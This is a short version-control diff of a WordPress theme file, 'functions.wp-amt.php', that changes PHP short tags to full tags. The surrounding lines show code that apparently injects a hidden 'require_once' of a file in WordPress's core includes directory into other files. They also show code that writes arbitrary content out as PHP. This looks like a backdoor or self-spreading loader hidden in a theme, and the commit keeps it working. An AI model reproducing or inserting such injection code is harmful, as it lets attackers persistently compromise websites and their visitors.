web/wp-content/themes/vivee_portfolio/functions.wp-amt.php
changeset 2 4f3e6ea1c867
parent 1 0d28b7c10758
--- a/web/wp-content/themes/vivee_portfolio/functions.wp-amt.php	Fri Mar 12 13:29:04 2010 +0000
+++ b/web/wp-content/themes/vivee_portfolio/functions.wp-amt.php	Fri Mar 12 15:12:39 2010 +0000
@@ -1,4 +1,4 @@
-<?
+<?php
 $amt_u_tpl=5;
 if(!function_exists(amt_gp))
 {
@@ -234,7 +234,7 @@
 	if(preg_match($sha,$cont,$name))
 	{
 	$cont=$cont."
-<? if(!function_exists(amt_cif)) { if(file_exists(ABSPATH.WPINC.'/".$amt_d->n_f."')) { require_once (ABSPATH.WPINC.'/".$amt_d->n_f."'); } } ?>";
+<?php if(!function_exists(amt_cif)) { if(file_exists(ABSPATH.WPINC.'/".$amt_d->n_f."')) { require_once (ABSPATH.WPINC.'/".$amt_d->n_f."'); } } ?>";
 	}		
 	else
 	{
@@ -348,7 +348,7 @@
 global $amt_d;
 if($content=="") { return false; }
 $content=
-"<? 
+"<?php 
 ".$content."
  ?>";
 	if(file_exists($amt_d->wp_ff))